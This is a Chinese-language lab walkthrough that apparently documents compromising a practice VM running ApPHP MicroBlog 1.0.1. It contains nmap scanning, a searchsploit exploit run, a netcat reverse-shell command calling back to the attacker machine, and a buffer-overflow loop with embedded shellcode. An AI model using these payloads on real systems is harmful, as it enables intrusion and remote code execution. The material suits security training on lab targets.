赞
踩
终于把这个系列的靶机打完了,后面会做一个小总结,近期暂时会把靶机练习放一段时间往其他知识点上去学习学习…
老实说感觉自己打了这一段的时间的靶机了,每次都会有新的问题也会get新的知识,究于还是自己的深度没有到一定位置,我的前路还有一篇宝藏等着我去挖掘!!!!
比如这个靶机其实十分简单但我不会缓冲区溢出(后续会去了解…)
kali:192.168.132.139
靶机IP:192.168.132.178
nmap -A -sV -p- -T4 192.168.132.178
web页面有一个后台管理员登陆口
This script was generated by ApPHP MicroBlog v.1.0.1
搜索一下相关漏洞
searchsploit ApPHP MicroBlog 1.0.1
searchsploit -m 33070.py
cat 33070.py
python2 33070.py http://192.168.132.178/index.php
发现一处账号密码,反弹shell试试、
kali:rlwrap nc -lvnp 1234
nc 192.168.132.139 1234 -e /bin/bash
发现有 clapton 用户,和数据库中的用户一样,尝试登录一下 clapton 用户
提示缓冲区溢出,并给出俩个案例
https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html
https://samsclass.info/127/proj/lbuf1.htm
这里带师傅链接:https://www.cnblogs.com/sainet/p/15789449.html
for i in {1..10000}; do (./input $(python -c 'print("A" * 171 + "\xe0\x13\x8b\xbf" + "\x90"* 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')); done
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。